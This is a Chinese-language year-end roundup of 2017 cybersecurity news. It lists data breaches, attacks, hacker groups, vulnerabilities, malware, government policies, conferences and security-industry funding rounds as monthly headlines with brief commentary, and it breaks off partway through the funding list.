网络安全事件

2017年网络安全行业大事记(最全完整版)

2018-02-231261411人围观 ,发现?8?个不明物体资讯

2017年是平凡的一年,但是对于网络安全行业注定是不平凡的一年。回首过去一年,数据泄露、黑客攻击、基础设施攻击、安全漏洞发现、恶意软件、行业融资投资收购等各个方面呈火山式增长的态势,无论是影响还是数量,均创下近几年之最。

2017年网络安全行业大事记

一、网络攻击事件

1、数据信息泄露

国 际

1月?美国特种作战司令部11G明文员工数据被泄露

2月?黑客泄露美警方论坛71.5万账户,涉FBI、NSA等

2月?《巫师》老开发者论坛被黑:190万份凭证遭窃

2月?126个vBulletin论坛遭遇入侵,82万个账户被泄露

2月?纽约机场750GB数据遭泄露,含设备密码和社会安全号码

3月?维基解密五波泄露“Vault 7”文件,CIA黑客工具被曝光

3月?13.7亿条被泄露的数据曝光,或涉及微信、苹果和facebook

3月?美国商业服务巨头Dun&Bradstreet 52GB数据库泄露

4月?斯诺登曝猛料:日美秘密合作监控亚太各国60多年

5月?印度1.35亿公民身份信息和1亿条银行账户信息泄露

5月?维基解密披漏CIA间谍软件“雅典娜”、标记工具Scibbles

5月?黑客提前泄露新片《加勒比海盗5》和《女子监狱》内容

6月?立陶宛考纳斯整形诊所海量顾客个人信息被黑客公开

6月?美国防承包商博思艾伦泄露五角大楼相关敏感文件

6月?全球因Hadoop服务器配置不当导致的数据泄露或达5120TB

6月?Tata开发人员将银行代码泄漏至公共GitHub代码库

6月?1000万辆汽车VIN识别码数据被泄

6月?2亿美国选民的个人资料被共和党合作数据公司意外泄露

6月?微软官方确认部分Windows10源码被泄露,容量约1.2GB

7月?美国知名征信机构Equifax数据泄露,1.4亿美国人受影响

9月?全球会计事务所德勤遭攻击,超500万电邮疑被泄

9月?日本社交网站账号密码泄露,含1.5万个go.jp后缀政府电邮

9月?邮件门后续:特朗普女婿私人邮箱处理白宫事务被曝光

9月?54万SVR账户从公开可访问的亚马逊AWS S3中泄露

9月?维基解密曝光俄罗斯版棱镜计划,俄监控互联网及移动用户

9月?服务器配置错误致9400份美军方和情报人员信息泄露

9月?黑客宣称掌握600多万Instagram账号信息

9月?垃圾邮件恶意程序“Onliner”瞄准7.11亿电子邮件账户

10月?美国知名化妆品公司Tarte无密码保护致200万用户信息泄露

10月?南非史上最大数据泄露,3000万公民信息暴露

10月?凯悦酒店被黑客攻击,中国18家住客信息

10月?黑客入侵卡布利洛学院服务器,4万学生个人信息泄露

10月?征信巨头Equifax遭入侵,约1100万美国车主信息遭泄露

10月?医疗卫生服务企业PHM47.5G信息泄露,15万患者病历曝光

10月?美国共和党电话拉票公司223GB数据泄露

10月?国外评论网站Disqus 1750万用户资料泄露

11月?美国国防部100GB顶级机密于AWS上曝光

11月?澳洲社会服务部信用卡系统泄露8500名员工数据

11月?Aadhaar数据泄露,印度210个政府网站披漏公民个人信息

11月?《南德意志报》获得“天堂文件”含1340万条记录

11月?马来西亚通信与网络运营供应商超4600万用户敏感信息泄露

12月?美加州数据分析公司泄露1.23亿敏感数据

12月?日产汽车加拿大公司113万车主敏感信息泄露

12月?美网络情报技术公司4IQ 泄露14亿登录凭证

12月?AI.type键盘应用泄露3100万用户个人数据

12月?美国DHS 24.6万员工信息泄露

国 内

1月?康师傅饮料瓶盖编码泄露,10万会员流入黑市

2月?台湾外事部门遭黑客攻击,1.5万笔个人资料外泄

4月?优酷上亿条账户信息泄露,价值仅为300美元

4月?《人民的名义》版权泄露,8.8元可购买全集

5月?浙江温岭特大网络诈骗案告破,涉案金额达2.2亿元

5月?台湾1.7亿笔个人资料外泄,受害者或有蔡英文

6月?小红书用户信息大面积泄露,50人被骗近88万元

6月?质检总局:8成智能摄像头存隐患,监控视频被非法牟利

6月?快递员泄露客户信息,获取3.8万元被判刑

11月?重庆九龙城区教委官网泄露上千教师个人信息

11月?江苏、广西等多地高校国家奖学金名单公示泄露

2017年全球信息泄露总体情况。据有关媒体统计,2017年上半年泄露或被盗的数据累积已达到惊人的19亿条。值得一提的是,这一数据已经是2016年被盗数据的总量,全年预计将超过50亿条,其中,仅雅虎一家就达到30亿条。并且,上半年全球发生918起网络安全入侵事件,国内用户每年至少信息被泄露5次。

随着云计算、大数据以及物联网的普及,数据信息泄露事件高速增长且数据量庞大。信息泄露涉及行业广泛,但重点目标集中在政府机构、高校、金融行业、医疗行业等。云服务提供商AWS、CIA武器库被维基解密曝光等都是2017年热议的重要课题,且信息泄露数据量庞大,达到GB/TB级别/万条。

全球各国都存在信息安全威胁,人民成为事件最大的牺牲者。随着互联网的普及,计算机和手机等终端已然成为人们生活和工作必不可少的工具,人们无私地将自己的个人信息“抛”向各类网站,例如2017年vBulletin论坛、凯悦酒店、供应商AWS、优酷等泄露事件,人们的信息安全存在巨大的潜在威胁,而人们在信息泄露事件面前显得无助。

2、网络攻击历史

攻击事件历史

国 际

1月?黑客出售美国第五大移动运营商“Cellular”1.26亿客户信息

1月?美国联邦调查局(FBI)网站遭CyberZeist黑客攻击

1月?黑客攻击以色列Cellebrite公司,900G客户手机数据泄露

2月?美国第二大通讯社UPI网站83000个账号信息被窃

3月?美国社交软件Wishbone遭黑客攻击,220万个电子邮箱地址泄露

3月?美国支付巨头Verifone遭网络攻击,提醒员工24小时内更改密码

4月?监控软件厂商Retina-X和FlexiSpy被黑客窃取13万用户信息

4月?朝鲜黑客攻击多国银行,窃取资金超6亿人民币

4月?黑客入侵250个ISIS推特账号,并发布成人内容

4月?每天平均2.5万台设备被NSA黑客工具感染

5月?黑客攻击卡塔尔通讯社旗下网站与推特

5月?俄罗斯黑客入侵100多万部安卓手机,窃取609万元

5月?哈佛大学校媒网站遭黑客入侵,扎克伯格照片被PS

5月?俄罗斯黑客攻击法国大选马克龙竞选团队

6月?NSA机密文件再泄露,涉俄罗斯黑客对美国大选的干预行为

6月?英国黑客承认入侵美国军事卫星网络盗取信息

6月?立陶宛整形医院遭Tsar Team黑客组织入侵

6月?阿联酋驻美大使邮件遭黑客窃取,与以色列智库会晤议程被曝光

6月?美国军用卫星电话及消息收发系统被英国黑客入侵

6月?英国议会网络系统遭黑客攻击长达12小时,议员会议记录或被窃取

6月?美国地方政府网站遭IS黑客攻击

6月?俄罗斯黑客入侵美国39个州选举系统,60万选民遭泄露

9月?俄罗斯黑客利用恶意软件RouteX,感染美国网件路由器实施撞库攻击

9月?德国竞选网站遭3000余次网络攻击,多数ip地址来自俄罗斯

9月?朝鲜黑客袭击了4个虚拟货币交易所

11月?朝鲜黑客对美航空、电信和金融企业展开网络攻击

11月?黎巴嫩外交部及其20个驻外大使馆官网被黑

11月?朝鲜黑客加大对美国国防部攻击力度,窃取武器系统和知识产权

11月?尼泊尔NIC亚洲银行SWIFT服务器遭黑客入侵,被盗4.6亿卢比

11月?朝鲜黑客入侵韩国造船和海洋公司,窃取4万份军事机密及军舰蓝图

12月?荷兰网络安全公司Fox-IT遭遇中间人攻击

12月?全球25名超级黑客参加美空军H1-212入侵计划

国 内

1月?黑客出售中国10亿账户数据,主要来自腾讯、网易和新浪等互联网公司

6月?黑客利用腾讯成长守护平台勒索玩家

6月?哈尔滨网上机动车选号遭黑客攻击,致系统瘫痪

6月?黑客利用连字符,伪造URL进行网络钓鱼

网络攻击的目标和手段依旧是多样化。运营商系统、高校网站系统、工业控制系统以及银行系统,甚至是航天航空系统、各国选举系统等都成为黑客攻击行动的目标,即使FBI和美空军也难逃黑客的“手掌”。从黑客的攻击手段来看,DDoS攻击、中间人攻击、恶意软件、钓鱼攻击都是黑客常用的手段,呈现多样化、破坏性强的发展趋势。只要网络能够延伸到的地方,或许都会成为他们瞄准的目标。

网络安全企业并不是安全的。12月,荷兰网络安全公司Fox-IT遭遇不明身份的黑客进行中间人攻击,攻击持续10小时24分钟,Fox-IT在事发5小时后检测到攻击情况并禁用双因素认证服务,从而有效地阻止用户登录并暴露其他重要的文件和数据。网络安全类的企业,其未来发展恐将迎来更多的威胁和挑战。

网络“战场”面前没有大国与小国之分。网络攻击背后的国家力量日益明显,无论是对基础设施的长期控制,还是各国选举系统的入侵,以及是对社交舆论的导向,甚至是鲜为人知的网络交易,以上所有的内容都闪现出黑客活动的影子。网络攻击,已经横跨金融、高校、医疗、政府机构、社交媒体等各个关键领域。勒索软件等黑客工具或者网络武器正在被世界各国所利用,弱小的国家在技术上打破传统资源和规则限制借此挑战大国,网络空间也逐渐成为各国在争取的战场,未来很有可能网络即是战场,代码就是武器。

黑客组织活动

国 际

4月?俄黑客组织APT28入侵法国大选领先者马克龙团队

4月?印度匿名者组织入侵Snapchat公司并窃取170万用户数据

4月?FireEye称中国黑客组织APT-10因萨德行动而活动频繁

5月?据调查APT32(OceanLotus)黑客组织或与越南有关

5月?俄网络安全公司揭黑客组织Lazarus与朝鲜秘密关系的证据

6月?FireEye调查显示 APPT28曾攻击黑山政府,影响外国政府进程

6月?黑客组织“匿名者”向全球超140个金融机构发起新一轮攻击

6月?俄罗斯揭黑客组织Lazarus与朝鲜“秘密关系”的最新证据

9月?黑客组织“白象团伙”借中印边境问题发起攻击

9月?黑客组织Phantom Squad向全球数千家企业发起DDoS勒索邮件

9月?黑客2016年将目标对准21个州的选举系统

9月?思科推测CCleaner被感染事件疑似与黑客组织APT17有关

9月?伊朗黑客组织APT33专门窃取能源与航空航天企业商业机密

9月?黑客组织匿名者公布57个全球银行目标

9月?黑客组织匿名者入侵以色列政府网站

9月?黑客组织DarkOverlord窃取美国蒙大拿州学区数据索要赎金

9月?黑客组织Ourmine入侵音乐媒体Vevo服务器,超3.1TB文件泄露

9月?美国于网络战场上与ISIS展开全面对抗

9月?俄罗斯黑客组织“蜻蜓”渗透美国和欧洲电网

9月?黑客组织OurMine入侵维基解密网站,其被挂黑页

9月?黑客组织Lazarus利用中国基础设施,对亚太发起定向攻击

10月?黑客组织APT28利用“网络冲突”诱导文件开展攻击

10月?黑客组织APT28欲在Flash零日漏洞修复前发起网络攻击

10月?黑客组织Anonymous入侵西班牙国家宪法法院官网

10月?朝鲜黑客入侵韩军电脑,窃取美韩机密应战计划

10月?黑客组织“CoDe Break3r”入侵加纳.gov网站,并挂巴基斯坦国旗

11月?朝鲜APT组织Lazarus瞄准韩国三星移动设备领域

11月?黑客组织Cobalt利用office漏洞,对全球金融机构发起钓鱼攻击

11月?俄黑客组织APT28频繁利用热点新闻事件发起DDE攻击

11月?俄黑客组织APT28企图黑进乌克兰火炮控制程序

11月?黑客组织SowBug利用恶意软件,窃取南美、东南亚等多国外交机密

11月?越南黑客组织APT32目标瞄准亚洲国家政府、军事等机构

11月?土耳其黑客组织攻击《以色列时报》官网,篡改页面声援巴基斯坦

11月?乌克兰称勒索软件“坏兔子”幕后黑手是俄罗斯APT28

12月?Lazarus APT黑客组织将目标瞄准加密币

12月?威胁组织APT-C-23利用恶意软件窃取安卓手机敏感数据

12月?黑客组织MoneyTaker发起攻势,目标由美国转向俄罗斯

试图破坏各国大选成为2017年黑客组织的热衷目标。据统计,2017年全球18个国家的大选活动遭受黑客攻击,如:俄罗斯黑客组织APT28在法国大选期间入侵马克龙的电子邮件等,全球具备不受干扰的互联网通信体系的国家只有不到25%。

APT28、Ourmine、Lazarus、匿名者等黑客组织活动频繁,鲜为人知的组织“面世”。不论是2017年还是往年黑客组织活动情况,APT28、Ourmine、Lazarus、匿名者都是实施网络攻击常见的身影,据有关数据显示,该黑客组织背后往往有国家的支持。除此之外,SowBug、DarkOverlord等鲜为人知的黑客组织在不断被人们所挖掘和曝光。

黑客组织实施网络攻击不是平白无故。网络能够延伸到的地方也难逃黑客所及,从2017年黑客组织活动情况来看,他们在实施攻击的时候带有一定目的性,其中政治原因、经济目的、社交舆论导向、宣誓主权等都是黑客组织的目的。

拥有国家背景的黑客组织越来越多。随着全球各大媒体的曝光度以及从事网络安全的技术人员不断深究,让不少黑客组织的背景、活动和技术不断被人们所了解。据调研,黑客组织APT33、APT28等组织都拥有一定的国家背景,从黑客组织的活动趋势以及各国对网络空间的“竞技”来看,未来拥有国家背景的黑客组织数量或将逐年递增。

3、基础设施攻击

国 际

1月?土耳其断电实则是网络攻击而非下雪问题

3月?宜家首款智能LED灯泡被指易遭黑客攻击

4月?斯诺登曝猛料:日本美国秘密合作监控亚太各国60多年

6月?黑客用U盘启动软件让印度ATM机吐钱,Windows XP再次中招

6月?韩多家银行遭黑客组织勒索,金融监督进入紧急状态

6月?尼日利亚网络黑手伸向全球500家工业企业

6月?乌克兰国家银行、电力公司遭受大规模网络攻击

6月?卡塔尔半岛电视台网站和数字平台遭黑客攻击

11月?英称俄罗斯黑客攻击当地能源、电信和媒体,破坏基础设施

国内

2月?共享单车车锁现漏洞,小学生5秒解锁

3月?公共场所充电设备窃取用户信息,可被黑客控制

6月?银行卡盗刷黑产:一天发3万木马短信,月入可达十几万

各国关键基础设施或将面临大型网络攻击的威胁。2016年,乌克兰电网遭受黑客攻击导致大规模的停电,攻击持续大约30分钟;旧金山地铁被勒索软件攻击使乘客可以免费乘坐地铁等事件都使关键基础设施遭受巨大的损失。据《2018年全球风险报告》指出,虽然绝大多数针对关键和战略系统的网络攻击并未成功,但是即便如此,数量众多的网络攻击尝试也昭示着全球面临网络攻击的风险在不断提升。并且,黑客关注的不仅仅是核心数据的窃取,更多的是针对的是基础设施,金融机构、政府机构、能源行业、高校机构、医疗机构都成为黑客的目标。

物联网安全将呈现爆发式增长,DDoS成为常态。据悉,物联网市场的快速增长,全球正处于受攻击目标呈指数级增长的危机边缘,《2018年全球风险报告》指出,新的联网设备将迎来爆炸式增长,2017年IoT设备84亿台,到2020年将增长到204亿台。并且,DDoS攻击已经是当下极为普遍的主要威胁之一,据统计,2017年DDoS攻击目标在以季度为周期遭遇的平均入侵活动量高达32次。

4、安全漏洞曝光

国 际

1月?盗版者利用YouTube漏洞上传并且分享“颜色”视频

2月?WordPress现重大漏洞,影响150万网站

2月?厉害了Word黑客,15万台打印机轻松劫持

3月?WhatsApp和Telegram存在安全漏洞,黑客可全面接管账户

3月?开源框架Struts 2存在高危漏洞,全球网站受影响

3月?德国美诺洗碗机被曝“目录遍历漏洞”

5月?CNNVD曝光Samba远程代码执行漏洞

5月?意大利专家曝光Uber平台身份认证漏洞

5月?Windows10默认浏览器曝漏洞,攻击者可窃取cookies与密码数据

5月?全球不同厂商1250种型号的摄像头存在共同漏洞

5月?黑客利用SS7协议漏洞窃取德国多家银行账户资金

6月?Linux现严重漏洞,仅靠恶意DNS响应就能实施远程攻击

6月?FFmpeg曝任意文件读取漏洞

6月?Stack Clash漏洞:可提取Unix/Linux系统

6月?2017款斯巴鲁被曝软件安全漏洞,黑客入侵如履平地

9月?google公布PoC代码通过WIFI连接劫持iPhone 7

9月?公司IOActive发现21款移动政权交易应用存在各种安全漏洞

9月?蓝牙协议漏洞:BlueBorne攻击影响数十亿蓝牙设备

9月?苹果macOS新版本就被曝光0day漏洞

9月?ApacheTomcat安全漏洞预警

9月?Struts漏洞导致1.43亿美国公民信息被泄露

9月?墨西哥退税网站MoneyBack泄露400GB客户敏感数据

10月?Oracle远程安全漏洞CVE-2017-10151

10月?KRACK攻击可劫持WPA2通信数据

12月?论坛软件vBulletin曝光零日漏洞,可致远程代码执行、任意文件删除

12月?谷歌AI学习系统现重大安全漏洞

12月?Windows安全软件曝出远程代码执行漏洞

国 内

1月?支付宝现惊人漏洞,陌生人可能登录您的支付宝账号

3月?人脸识别系统存在安全漏洞,可被黑客攻击(315晚会)

5月?OPPO R9s曝致命漏洞,指纹和密码失效

6月?无人机实名制系统存漏洞,身份信息乱填也可通过

2017年网络安全行业大事记

2017年漏洞数量激增。据国家信息安全漏洞共享平台统计,2017年全球共计15381起漏洞曝光事件,该数据远远超过2016年全年10300起。其中重要的原因是云计算、移动互联网、物联网设备的普及,各种网络应用的诞生,以及更多技术人员进入安全领域并开始关注漏洞的挖掘和漏洞技术细节的披漏。

2017年网络安全行业大事记

▲2017年漏洞产生原因五花八门。据国家信息安全漏洞共享平台统计,从漏洞产生的原因来看,输入验证错误和设计错误成为2017年漏洞产生的重要原因,两者比例合并占85.07%。

2017年网络安全行业大事记

2017年中、高危漏洞为主。据国家信息安全漏洞共享平台统计,从漏洞的严重程度来看,中高危类型的漏洞成为漏洞危害的两种类型,两者比例占92.69%。

底层漏洞防不胜防。芯片或固件一旦出现漏洞,无论是卸载软件、打补丁,还是重装操作系统都是亡羊补牢,而更新固件或者更换硬件都将面临更大的挑战。

漏洞深入方方面面的产品。数字应用软件漏洞、安防设备监控摄像头、安全协议等都是漏洞藏身之处。

顽固漏洞补丁难打难除。出于各种原因,部分漏洞需要时隔很长时间才能修复,甚至永远难以修复,而只有修复之后才谈得上更新。最后老旧系统的更新才面对真正的、前所未有的挑战。

#通信协议或标准漏洞影响巨大。动辄影响上亿的设备,而协议的更新换代则需度过漫长的时间周期。

5、恶意软件发现

国 际

3月??全球五大恶意软件被曝光,黑客利用各种攻击媒介和策略实施攻击

3月??Gmail新型钓鱼攻击:伪装成附件图片来盗取用户凭证

3月??两家大型企业36部手机被预装恶意软件,小米中兴在列

4月??新型安卓恶意程序FalseGuide,感染200万Google Play用户

2月? 恶意软件Fileless攻击感染全球140家银行、金融机构和企业

5月??2017年上半年,11大知名恶意软件出炉,分别是比特币勒索软件WannaCry、木马CryptoWall和Nivdort、一款和木马、后门等其他恶意程序结合使用的恶意程序HackerDefender、安卓恶意软件Hiddad、HummingBad和Triada、伪造安全软件的Necurs、感染Windows用户的Sality、通过垃圾邮件活动的Zeus、蠕虫Conficker

6月??Petwrap勒索软件、通过垃圾邮件来诱导用户的Jeff勒索病毒、以RaaS? 服务形式出现的Mac勒索软件

6月??新Petya并非勒索软件,而是Wiper恶意软件

6月??黑客利用NSA恶意软件感染Windows设备挖矿

6月??韩国IDC被Erebus软件勒索683万

6月??新型恶意软件Kasperagent干扰巴基斯坦选举

6月??两款新型Linux恶意软件:一个挖加密货币,一个创建代理网络

9月 ?恶意软件ZNIU利用脏牛漏洞攻击安卓设备

10月?勒索软件Matrix通过广告传播恶意代码

10月?英国谴责朝鲜是WannaCry恶意软件的幕后黑手

10月?勒索病毒Bad Rabbit“坏兔子”席卷全球

10月?伪装VPN应用程序的勒索软件Tyran伊朗蔓延

10月?恶意软件FormBook攻击美国韩国的国防工业

11月?新型勒索软件GIBON通过恶意垃圾邮件传播

12月?新型攻击利用Excel表格启动恶意软件Loki Bot窃取密码

12月?美国预警:恶意软件HatMan、Triton针对工控系统展开攻击

12月?新型恶意软件PRILEX针对巴西银行窃取ATM用户信息

12月?FireEye发现新型工控恶意软件TRITON

12月?新型勒索软件File Spider伪装邮件,攻击波黑、塞尔维亚和克罗地亚等国家

▲恶意软件爆炸式增长,黑客活动猖獗。恶意软件无疑是近几年活动较为频繁的一年,就《2017年上半年中国网络安全报告》期内,上半年截获病毒样本3132万个,木马病毒占病毒总体数量的42.33%;上半年截获勒索软件样本44.86万个,感染统计307万次,国内广东、北京和云南是勒索软件感染地域前三甲。

▲勒索软件威胁度不减,影响范围广。据统计,2017年5月永恒之蓝勒索病毒波及150国20万台计算机设备,黑客至少获利2.6万美金,其影响波及全球高校、政府机构、国有企业等行业,这无疑是2017年全年度影响最大的网络安全事件。WannaCry事件发生后,勒索软件Petya和坏兔子“Bad Rabbit”后来者居上,再度掀起行业新浪潮。

二、行业政策与演习

国 际

1月?印尼成立国家网络机构

2月?英国政府出资2000万英镑,为青少年提供网络安全培训

2月?英国女王正式宣布开启国家网络安全中心

4月?美国网络司令部与NSA职业黑客举办防御演习,新增无人机挑战项目

4月?美FCC(美国联邦通信委员会)废除前总统奥巴马网络中立政策的计划

4月?美国制定《网络威胁框架》 ,对网络威胁事件评估

4月?韩国建立“三轴系统”防御计划,强调网络安全和军事间谍卫星

5月?美国签署《增强联邦政府网络与关键性基础设施网络安全》行政令

5月?美国NIST针对联邦机构发布网络安全框架草案

5月?澳大利亚签订《国家网络安全战略》

6月?美国、以色列强强联手,达成新的网络安全合作协议

6月?欧盟28国联合对抗国家支持型黑客行动,推出“网络外交工具箱”联合框? ? 架

6月?欧盟议会提出修正草案,建议禁止使用加密后门

6月?澳大利亚与泰国签署打击网络犯罪合作协议

6月?新加坡与澳大利亚就网络安全开展深度合作

8月?澳大利亚设立网络情报监测部门

9月?澳大利亚电信公司SAS与安全公司CheckPoint签署卫星网络安全协议

9月?英国NCC推出CENTA计划,提供安全支持加强网络威胁保障

9月?土耳其将推出新的网络安全计划

9月?欧盟进行最高级别Cybrid联合网络防御演习

10月?俄罗斯推新法严控VPN,为大选护驾

10月?全球网络安全合作计划Epic正式启动

10月?澳大利亚发布《关键基础设施安全法案》草案公开征询意见

11月?英国NHS投资2000万英镑成立新安全运营中心,以增强网络防御体系

11月?哈萨克斯坦的网络安全战略——“网盾”计划

11月?新加坡完善新网络安全法案,保障国家关键基础设施安全

11月?新加坡修改个人数据保护法案,严防国民身份信息被盗

11月?北约拟增设两个司令部,重视网络安全防御

11月?特朗普政府计划制定新的“网络安全战略”

11月?印度成立道德黑客部队“卡其帽”,保护政府关键基础设施

11月?荷兰政府推出新法案,可拦截与分析互联网流量

12月?北美“GridExIV”网络战演习:美国防备朝鲜EMP攻击

12月?美国特朗普发布首份《国家安全战略》,三个方面保护网络安全

12月?印度成立第三个计算机应急响应小组——“NIC-CERT”

12月?特朗普签署新法令,美国政府正式禁用卡巴斯基软件

12月?北约向网络战规则中添加“攻击性攻略”条款

12月?英国NCSC宣布政府系统不使用卡巴斯基

国 内

1月《信息通信网络与信息安全规划(2016-2020)》正式发布

1月?中国网络空间安全协会2017年第一次常务理事会

1月?贵阳发布国内首个针对网约车信息安全制定管理办法

1月?中共中央办公厅、国务院办公厅印发了《关于促进移动互联网健康有序? 发展的意见》

2月?中国将成立网络安全审查委员会

2月?公安部发布《旅馆业治安管理条例(征求意见稿)》

3月?信息网络安全公安部重点实验室2017年开课

4月?新版“测绘法”严格规范互联网地图个人信息保护

4月?北京成立网络与信息安全信息通报中心

4月?重庆电信修订出台《中国电信信息安全管理办法》

4月?中国与澳大利亚达成网络安全协议 网络互不攻击

5月?中国人民共和国国家情报法(草案)全文公开征求意见

5月?广州市重点单位签署《网络安全责任书》

6月?中央网信办印发《国家网络安全事件应急预案》

6月?工信部等八部门联合发布《无人驾驶航空器系统标准体系建设指南》

6月?中央印发《中国金融业信息技术“十三五”发展规划》

6月?中央深改组通过《关于设立杭州互联网法院的方案》

9月?腾讯、新浪微博、百度贴吧因违反《网络安全法》遭重罚

8月?工信部发布修订的《互联网域名管理办法》

11月?中国印发《推进互联网协议第六版(IPv6)规模部署行动计划》

11月?工信部印发《公共互联网网络安全突发事件应急预案》

12月?工信部印发人工智能3年行动计划,重点培育智能网联汽车

我国《中国人民共和国网络安全法》出行 但是任重道远。《中国人民共和国网络安全法》已于2017年6月1日正式实施,该法律最重要的意义在于,从法律层面上把我国网络安全工作提高至国家安全战略的高度,强调了关键信息基础设施及其个人信息数据的保护,明确了国家、主管部门、网络所有者、运营者及普通用户各自的责任以及违规后的相关处罚。在合规应对实施环节,从网络运营安全、网络信息安全及关键信息基础设施保护三个层面,就“相关责任方”、“管理措施”及“技术措施”等三个维度总结了具体实施要点。然在网络安全法施行之后,就不同的网络安全情况和事件还需不断自我完善和自我总结。

以法保护网络空间安全成为各国关注的焦点。从美国签署的《增强联邦政府网络与关键性基础设施网络安全》和澳大利亚发布《关键基础设施安全法案》草案公开,再到俄罗斯的VPN禁令和中国的《网络安全法》,基础设施网络安全、公民个人隐私数据保护等都成为各国安全防护的重点,同时个人隐私保护与商业利益、国家安全交织,网络空间安全成各国政府政治、经济博弈重点。

各国强强联手共建网络命运共同体或成趋势。从美国以色列达成新的网络安全合作协议、新加坡与澳大利亚就网络安全开展深度合作,再到中国与澳大利亚达成网络安全协议,网络互不攻击。如今互联网已经渐渐全球化,各国正在跨越地理区域充分利用各自设备、技术和人才等资源优势,强强联手共同维护各国网络空间的安全。

数字化进程扩大网络安全产业,各国安全政策压缩彼此市场空间。数字化进程不断的促进网络安全市场空间的拓张,努力向前发展的企业不可避免的倾向使用先进的技术。而网络安全又是国家安全的重要组成部分,各国之间是一个竞争与合作的“命运共同体”。各国自主可控、自主创新以及封闭与开源,永远都是安全行业热议的话题。因此如何在符合对方国家大政策体系和规范的前提下,尽最大可能地将自身的技术和产品融合到当地的安全生态圈中,是跨国安全企业在未来几年的重要挑战。

三、市场活动情况

1、会议和活动

国 际

2月?2017 RSA Conference信息安全峰会

3月?2017年温哥华Pwn2Own 2017年世界黑客大赛

4月?2017中国网络安全技术对抗赛

4月?全球最大规模的网络攻防年度演习—锁定盾牌2017

5月?2017年国际安全极客大赛GeekPwn大赛

5月?SyScan360黑客大会(西雅图)

6月?WCTF世界黑客大师挑战赛

7月??BlackHat & DEFCON拉斯维加斯成功举办

10月?GeekPwn2017国际安全极客大赛上海站

10月?2017年非洲网络安全会议

11月?微软、IBM、TCS等组建技术联盟抵御网络威胁

11月?第六届移动Pwn2Own黑客大会于东京举行

11月?美国国家网络安全意识月

国 内

3月??RSAC热点研讨会

3月??2017年补天白帽大会

4月??中国在贵州成立首个大数据安全实验室

4月??安胜成立ISEC实验室

4月??2017年首都网络安全日

5月??2017“西湖论剑”中国网络安全创新分享大会(乌镇)

5月??2017年中国网络安全年会

5月??2017年第三届SSCTF全国网络安全大赛

5月??香港首个抗衡黑客攻击的网络靶场曝光

6月??国内首部有关网络安全的《网络安全法》正式实施

6月??国内召开国家工业信息安全产业发展联盟成立大会

6月??2017第五届中国网络安全大会(NSC2017)

6月??CISP Hangzhou2017信息安全沙龙

6月??2017 MOSEC移动安全技术峰会

6月??OWASP2017亚洲峰会

7月??C3安全峰会

9月??2017第二届SSC安全峰会

9月??2017 第五届ISC中国互联网安全精英峰会

9月??2017年首届国际机器人网络安全大赛

9月??2017年网络安全周|网络安全博览会

9月??2017世界物联网博览会.江苏无锡

10月?2017年云栖大会于杭州举办

11月?2017全国大学生网络安全邀请赛

12月?2017年浙江乌镇互联网大会

12月?第八届中国信息安全法律大会于北京举行

2018年1月?2017年安胜第二届技术峰会(ASTC)于厦门成功举办

各国峰会和网络安全技术大赛等活动空前发展,不断重视网络安全建设。2017年,各国关于网络安全峰会与演习活动的规模和数量呈现爆发式增长,对此不难看出各国对网络空间安全的重视程度不断提升到另外一个高度,也可以说是网络空间安全日渐成为世界各国的国家战略。据报道,美网络司令部2018年的网络战军备竞赛预算将增加44亿元,并且各国组织机构也将加大网络安全的投入,以控制潜在的安全风险。从一些网络强国的举措,不难看出各国在不断强化网络的“城墙”,铸造更好的“盾”。

2017年国内网络安全相关会议活动总数预计超过300场。据悉,百人规模的活动超过100场,千人规模的活动10场以上,有关媒体粗略算一下会议成本约在1亿~3亿元。

知名峰会热度不减,不降反升。网络安全峰会旨在分享全球最新的网络安全的技术和知识,全球范围内知名的峰会有如RSA、极客大赛GeekPwn2017,国内知名也有ISC、首都网络安全日等。就RSA 2017全球就有680余家机构参展,较去年约增长23%,我国就有32家机构参展,数量增加82%。

网络攻防比赛亦是爆发态势。XCTF、WCTF、TCTF、X-NUCA、铁人三项以及各省市政府、协会组织的网络安全竞赛纷纷而起。而安全竞赛的意义主要在于:一是增强网络安全在整个社会的影响力,向社会推广网络安全知识以及提高全民网络安全意识;二是培养和发现锐意进取的网络安全人才。

网络会议活动百花齐放、百家争鸣。2017年网络安全的会议与活动可大致分为国家与地方政府牵头的会议、综合性的产业会、展览会、技术研讨会、解决方案会、安全厂商渠道客户会、新品发挥会、战略合作会、融资见面会、信息安全各大会议安全分论坛、大型互联网公司的SRC会和各机构举办的破解的攻防大赛等等。

选择定位精准、性价比高、贴近行业需求、贴近用户需求将是安全厂商举办活动的意义所在。对于主办方来说,精选议题和嘉宾,尽量为听众带来更有价值的内容才能提升会议的真正价值。2017年用户或渠道大会明显增多,也从客观上反映用户至上的办会趋势。

2、融资与收购

0.png0 (1).png2017年网络安全行业大事记2017年网络安全行业大事记

国 内

2月:

身份认证安全公司九州云腾Pre-A融资1000万元,投资方为绿盟科技;

欺骗防御及云安全公司默安科技Pre-A融资3000万元;

威胁追捕公司中睿天下Pre-A融资2000万元。

3月:

大数据反欺诈公司数美科技A轮融资1000万美元,投资方包括360和百度;

云安全公司上元信安A轮融资3000万元,投资方为任子行。

4月:

高级网络威胁(APT)公司东巽科技A轮融资4000万元;

威胁情报+安全服务公司数字观星天使轮融资1000万元;

业务风控与反欺诈公司岂安科技A轮融资(千万元级);

数字证书公司格尔软件上交所上市,IPO募资总额2.76亿元;

工控安全公司天地和兴A轮融资(千万元级)。

5月:

Hadoop安全公司观数科技Pre-A融资1500万元;

金融反欺诈公司邦盛科技B+轮融资1.6亿元;

保密技术及产品厂商中孚信息深交所上市,IPO募资2.62亿元;

大数据+数据安全公司志翔科技B轮融资(近亿元)。

6月:

智能身份认证公司芯盾时代B轮融资近亿元;

智能风控公司猛犸反欺诈(上海行邑)A+轮融资5000万元;

业务风控公司顶象技术A轮融资(千万元级);

下一代应用安全公司长亭科技A轮融资(千万元级);

工控安全公司威努特C轮融资8000万元;

新三板挂牌公司永信至诚发布定增方案,融资额约7500万元;

云抗D公司青松智慧B轮融资(千万元级)。

7月:

移动应用安全公司几维安全(成都盈海益讯)Pre-A融资1000万元;

统一内容安全公司天空卫士完成A轮融资,总融资额达1.5亿元,投资方包括360;

大数据安全公司瀚思安信B轮融资1亿元;

可视化应用层安全公司安博通新三板股票发行募集资金7552万元。

8月:

工控安全公司安点科技第二轮融资4500万元;

大数据安全公司兰云科技A轮融资5000万元;

身份认证公司锦佰安Pre-A融资1500万元;

终端安全公司杰思安全A轮融资3000万元;

终端安全公司火绒安全Pre-A融资1500万元,投资方为天融信。

9月:

威胁情报公司微步在线B轮融资1.2亿元;

大数据安全公司上海观安A+融资5400万元;

